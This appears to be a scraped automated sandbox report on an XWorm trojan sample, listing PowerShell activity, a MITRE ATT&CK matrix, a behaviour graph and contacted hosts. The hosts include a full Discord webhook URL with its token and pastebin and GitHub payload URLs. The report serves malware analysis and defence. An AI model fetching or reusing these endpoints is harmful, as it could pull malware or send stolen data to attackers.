Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link		111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Regsvr32		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Rundll32		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534111 Sample: 5UIy3bo46y.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 65 pastebin.com 2->65 67 time.windows.com 2->67 69 5 other IPs or domains 2->69 85 Suricata IDS alerts for network traffic 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 Multi AV Scanner detection for submitted file 2->89 93 3 other signatures 2->93 10 loaddll64.exe 1 2->10         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 91 Connects to a pastebin service (likely for C&C) 65->91 process4 signatures5 105 Obfuscated command line found 10->105 17 rundll32.exe 10->17         started        20 cmd.exe 1 10->20         started        22 regsvr32.exe 10->22         started        32 2 other processes 10->32 107 Suspicious powershell command line found 13->107 24 powershell.exe 7 13->24         started        26 conhost.exe 1 13->26         started        28 powershell.exe 15->28         started        30 conhost.exe 1 15->30         started        process6 dnsIp7 77 Obfuscated command line found 17->77 35 powershell.exe 16 17->35         started        39 rundll32.exe 20->39         started        41 powershell.exe 22->41         started        79 Suspicious powershell command line found 24->79 43 powershell.exe 13 24->43         started        45 powershell.exe 28->45         started        63 tinyurl.com 104.18.111.161, 49743, 49744, 49745 CLOUDFLARENETUS United States 32->63 signatures8 process9 dnsIp10 71 pastebin.com 104.20.3.235, 443, 49752, 49753 CLOUDFLARENETUS United States 35->71 73 discord.com 162.159.128.233, 443, 52049, 52050 CLOUDFLARENETUS United States 35->73 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 35->95 97 Suspicious powershell command line found 35->97 99 Uses cmd line tools excessively to alter registry or file data 35->99 101 Powershell creates an autostart link 35->101 47 conhost.exe 35->47         started        103 Obfuscated command line found 39->103 49 powershell.exe 39->49         started        75 raw.githubusercontent.com 185.199.109.133, 443, 49759, 49760 FASTLYUS Netherlands 41->75 53 conhost.exe 41->53         started        55 attrib.exe 1 41->55         started        signatures11 process12 file13 61 C:\ProgramData\...\BeginSync.lnk, MS 49->61 dropped 81 Uses cmd line tools excessively to alter registry or file data 49->81 83 Tries to open files direct via NTFS file id 49->83 57 conhost.exe 49->57         started        59 attrib.exe 1 49->59         started        signatures14 process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5UIy3bo46y.dll50%ReversingLabsWin64.Trojan.XWorm

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.18.111.161
truefalse
    		unknown
    discord.com
    		162.159.128.233
    		truetrue
      		unknown
      raw.githubusercontent.com
      		185.199.109.133
      		truetrue
        		unknown
        s-part-0017.t-0009.t-msedge.net
        		13.107.246.45
        		truefalse
          		unknown
          pastebin.com
          		104.20.3.235
          		truetrue
            		unknown
            time.windows.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://tinyurl.com/yeykydunfalse
                		unknown
                http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                  		unknown
                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                    		unknown
                    http://pastebin.com/raw/sA04Mwk2false
                      		unknown
                      https://pastebin.com/raw/sA04Mwk2false
                        		unknown
                        https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://discord.compowershell.exe, 00000007.00000002.1650878851.0000019380448000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757A40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000007.00000002.1650878851.000001938174E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B469A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://go.micropowershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B37D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  https://discord.comPpowershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.microsoft.copowershell.exe, 00000007.00000002.1761764309.00000193E8BBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364535890.000002152C3C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://raw.githubusercontpowershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://discord.compowershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://raw.githubusercontent.comxpowershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://discord.com/api/webhooks/128545359042878powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmptrue
                                                		unknown
                                                https://raw.githubusercontent.compowershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tinyurl.compowershell.exe, 00000007.00000002.1650878851.0000019380225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B41D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://raw.githubusercontent.compowershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://raw.githubusercontepowershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://pastebin.comp6powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://cicro.compowershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
